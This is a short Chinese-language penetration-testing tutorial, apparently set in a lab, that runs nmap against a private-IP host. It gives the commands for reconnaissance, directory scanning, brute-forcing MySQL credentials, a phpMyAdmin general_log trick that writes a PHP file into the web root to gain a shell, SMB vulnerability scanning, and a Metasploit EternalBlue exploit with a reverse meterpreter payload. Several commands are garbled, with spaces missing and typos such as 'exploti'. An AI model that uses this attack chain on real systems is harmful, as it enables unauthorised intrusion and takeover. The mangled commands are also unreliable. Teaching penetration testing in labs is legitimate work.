nmap在滲透測試中的應用
Nmap這個神器在滲透測試中是必不可少的。從信息收集到拿shell。有時候還真少不了它!本文將要介紹nmap在滲透測試中,都有那些運用和攻擊手段。
nmap一:利用nmap對目標進行信息收集
命令如下:
nmap-T4-A 192.168.123.239
對目標主機掃描結果從上圖我們發現,目標是一臺windows系統,並且開啟了常見的804453306等常見的埠。
二:對目標站點進行掃描
命令如下:
dirb http://192.168.123.239
通過對目標站點分析,我們發現了一些敏感的文件目錄。phpMyAdmininclude等等。在第一步中,我們掃描到了3306埠,這也意味著目標可以遠程登錄資料庫。
三:利用nmap暴力破解mysql
命令如下:
nmap -p 3306 --script=mysql-brute.nse 192.168.123.239
如上,通過暴力破解,我們得到了帳號和密碼為root和123456
四:嘗試遠程登錄
命令如下:
mysql-h 192.168.123.239-uroot-p成功登錄資料庫
利用phpMyAdmin拿shell
在前期的文章中提到過,我們先登錄到phpMyAdin
執行下面的sql語句
SETGLOBAL GENERAL_log='on';SETGLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php';SELECT'<?php phpinfo(); ?>';需要注意的是,一定要寫對目標的站點根目錄的絕對地址執行完成後,會在更目錄生成一個cmd.php文件,我們訪問效果如下:
利用此種方式,便可成功拿shell。
五:利用nmap掃描目標主機漏洞
命令如下:
nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn掃描結果如下:
可以看到,目標存在ms17-010ms10-054CVE-2017-0143等漏洞。
六:配合msfconsole拿下系統權限
命令如下:
use exploit/windows/smb/ms17_010_eternalblueset RHOSTS 192.168.123.66set payload windows/x64/meterpreter/reverse_tcpexploti
通過上訴示例,我們利用nmap從簡單的信息收集到拿shell。一次完整的滲透測試就完成了。